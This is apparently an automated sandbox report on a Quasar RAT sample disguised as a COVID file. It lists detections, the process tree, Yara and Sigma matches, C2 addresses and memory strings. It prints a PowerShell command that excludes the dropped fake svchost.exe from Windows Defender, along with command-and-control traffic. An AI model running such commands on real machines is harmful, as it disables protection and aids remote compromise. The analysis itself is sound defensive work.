
Analysis Report New variant of covid 19.exe

Overview

General Information

Sample Name:New variant of covid 19.exe
Analysis ID:365752
MD5:a489513ca0de2472e0ad79830dd9ac44
SHA1:b767fe686e074f551773f208e1cb756d114e38c4
SHA256:df12835cd6bc77f9724900d2bf8f0403364ce6e8e81d389f8dc3b2eb8ca42961

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
System process connects to network (likely due to code injection or exploit)
Yara detected Quasar RAT
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Drops PE files with benign system names
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
May check the online IP address of the machine
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to delay execution (extensive OutputDebugStringW loop)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • New variant of covid 19.exe (PID: 6372 cmdline: 'C:\Users\user\Desktop\New variant of covid 19.exe' MD5: A489513CA0DE2472E0AD79830DD9AC44)
    • powershell.exe (PID: 6864 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6884 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 7008 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • New variant of covid 19.exe (PID: 7152 cmdline: C:\Users\user\Desktop\New variant of covid 19.exe MD5: A489513CA0DE2472E0AD79830DD9AC44)
    • WerFault.exe (PID: 5488 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 1956 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6132 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6156 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6460 cmdline: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' MD5: A489513CA0DE2472E0AD79830DD9AC44)
      • powershell.exe (PID: 6552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3440 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 5888 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • svchost.exe (PID: 1488 cmdline: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe MD5: A489513CA0DE2472E0AD79830DD9AC44)
  • svchost.exe (PID: 6568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6964 cmdline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 7112 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6988 cmdline: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' MD5: A489513CA0DE2472E0AD79830DD9AC44)
  • svchost.exe (PID: 5652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4144 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1240 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5820 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6628 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4952 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7032 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5320 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp
Rule: Quasar_RAT_1 (Detects Quasar RAT), Author: Florian Roth
Strings:
  • 0x3df40:$s1: DoUploadAndExecute
  • 0x3e184:$s2: DoDownloadAndExecute
  • 0x3dd05:$s3: DoShellExecute
  • 0x3e13c:$s4: set_Processname
  • 0x5824:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5748:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x61ae:$op3: 00 04 03 69 91 1B 40
  • 0x69fe:$op3: 00 04 03 69 91 1B 40

Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp
Rule: JoeSecurity_Quasar (Yara detected Quasar RAT), Author: Joe Security

Source: Process Memory Space: New variant of covid 19.exe PID: 7152
Rule: JoeSecurity_Quasar (Yara detected Quasar RAT), Author: Joe Security

Unpacked PEs

Source: 10.2.New variant of covid 19.exe.400000.0.unpack
Rule: Vermin_Keylogger_Jan18_1 (Detects Vermin Keylogger), Author: Florian Roth
Strings:
  • 0x3ec23:$x3: GetKeyloggerLogsResponse
  • 0x3de7b:$x4: GetKeyloggerLogs
  • 0x3e153:$s1: <RunHidden>k__BackingField
  • 0x3edeb:$s2: set_SystemInfos
  • 0x3e17c:$s3: set_RunHidden
  • 0x3dcaf:$s4: set_RemotePath
  • 0x32027:$s7: xClient.Core.ReverseProxy.Packets

Source: 10.2.New variant of covid 19.exe.400000.0.unpack
Rule: xRAT_1 (Detects Patchwork malware), Author: Florian Roth
Strings:
  • 0x305c0:$x4: xClient.Properties.Resources.resources
  • 0x30481:$s4: Client.exe
  • 0x3e17c:$s7: set_RunHidden

Source: 10.2.New variant of covid 19.exe.400000.0.unpack
Rule: Quasar_RAT_1 (Detects Quasar RAT), Author: Florian Roth
Strings:
  • 0x3e140:$s1: DoUploadAndExecute
  • 0x3e384:$s2: DoDownloadAndExecute
  • 0x3df05:$s3: DoShellExecute
  • 0x3e33c:$s4: set_Processname
  • 0x5a24:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5948:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x63ae:$op3: 00 04 03 69 91 1B 40
  • 0x6bfe:$op3: 00 04 03 69 91 1B 40

Source: 10.2.New variant of covid 19.exe.400000.0.unpack
Rule: Quasar_RAT_2 (Detects Quasar RAT), Author: Florian Roth
Strings:
  • 0x3ec23:$x1: GetKeyloggerLogsResponse
  • 0x3ee63:$s1: DoShellExecuteResponse
  • 0x3e7d2:$s2: GetPasswordsResponse
  • 0x3ed36:$s3: GetStartupItemsResponse
  • 0x3e154:$s5: RunHidden
  • 0x3e172:$s5: RunHidden
  • 0x3e180:$s5: RunHidden
  • 0x3e194:$s5: RunHidden

Source: 10.2.New variant of covid 19.exe.400000.0.unpack
Rule: MAL_QuasarRAT_May19_1 (Detects QuasarRAT malware), Author: Florian Roth
Strings:
  • 0x4f661:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 ...
  • 0x4f897:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C ...

Sigma Overview

System Summary:

Sigma detected: Executables Started in Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
Sigma detected: Execution in Non-Executable Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
Sigma detected: Suspicious Program Location Process Starts
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
Sigma detected: System File Execution Location Anomaly
Source: Process started; Author: Florian Roth, Patrick Bareiss; Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, NewProcessName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, OriginalFileName: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6156, ProcessCommandLine: 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' , ProcessId: 6460

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: liverpoolofcfanclub.com; Virustotal: Detection: 8%
Source: devils.shacknet.us; Virustotal: Detection: 9%
Yara detected Quasar RAT
Source: Yara match; File source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: New variant of covid 19.exe PID: 7152, type: MEMORY
Source: Yara match; File source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPE
Source: New variant of covid 19.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

May check the online IP address of the machine
Source: unknown; DNS query: name: ip-api.com
Source: global traffic; TCP traffic: 192.168.2.3:49717 -> 103.28.70.164:4782
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: global traffic; HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: liverpoolofcfanclub.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: liverpoolofcfanclub.com
Source: global traffic; HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 | Host: liverpoolofcfanclub.com
Source: global traffic; HTTP traffic detected: GET /json/ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 | Host: ip-api.com | Connection: Keep-Alive
Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp; String found in binary or memory: [liverpool.com page footer HTML, omitted here] equals www.facebook.com (Facebook)
Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp; String found in binary or memory: [liverpool.com page footer HTML, omitted here] equals www.twitter.com (Twitter)
Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp; String found in binary or memory: [liverpool.com page header HTML, omitted here; the entry is truncated in the report]
Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmp; String found in binary or memory: [liverpool.com article Open Graph meta tags, omitted here] equals www.facebook.com (Facebook)
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
      Source: unknownDNS traffic detected: queries for: liverpoolofcfanclub.com
      Source: New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://api.ipify.org/
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: powershell.exe, 00000005.00000002.312490657.0000000002ED5000.00000004.00000020.sdmp, svchost.exe, 00000015.00000003.281468526.0000000000E69000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: svchost.exe, 00000012.00000003.600569565.00000213EECA1000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: New variant of covid 19.exe, 00000000.00000003.196942702.00000000059C2000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
      Source: New variant of covid 19.exe, 00000000.00000003.197794290.00000000017B3000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdE
      Source: New variant of covid 19.exe, 00000000.00000003.197444758.000000000598F000.00000004.00000001.sdmp, New variant of covid 19.exe, 00000000.00000003.196942702.00000000059C2000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: New variant of covid 19.exe, 00000000.00000003.196929354.00000000017B3000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4b6f634dedba6
      Source: New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://freegeoip.net/xml/
      Source: New variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com
      Source: New variant of covid 19.exe, 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmpString found in binary or memory: http://ip-api.com/json/
      Source: svchost.exe, 00000012.00000003.600569565.00000213EECA1000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: svchost.exe, 00000012.00000002.601903948.00000213F4400000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
      Source: New variant of covid 19.exe, 0000000A.00000002.744882535.0000000002F6A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
      Source: powershell.exe, 00000022.00000002.413593519.0000000004CB2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: New variant of covid 19.exe, 0000000A.00000002.744575828.0000000002F31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000022.00000002.413593519.0000000004CB2000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: svchost.exe, 0000001B.00000002.311005148.0000022377213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
      Source: svchost.exe, 00000015.00000003.277937021.0000000000E86000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: svchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
      Source: svchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
      Source: svchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
      Source: svchost.exe, 00000018.00000002.739113278.000001712682A000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
      Source: svchost.exe, 00000018.00000002.739113278.000001712682A000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
      Source: svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
      Source: svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
      Source: svchost.exe, 0000001B.00000003.309882014.000002237724E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
      Source: svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
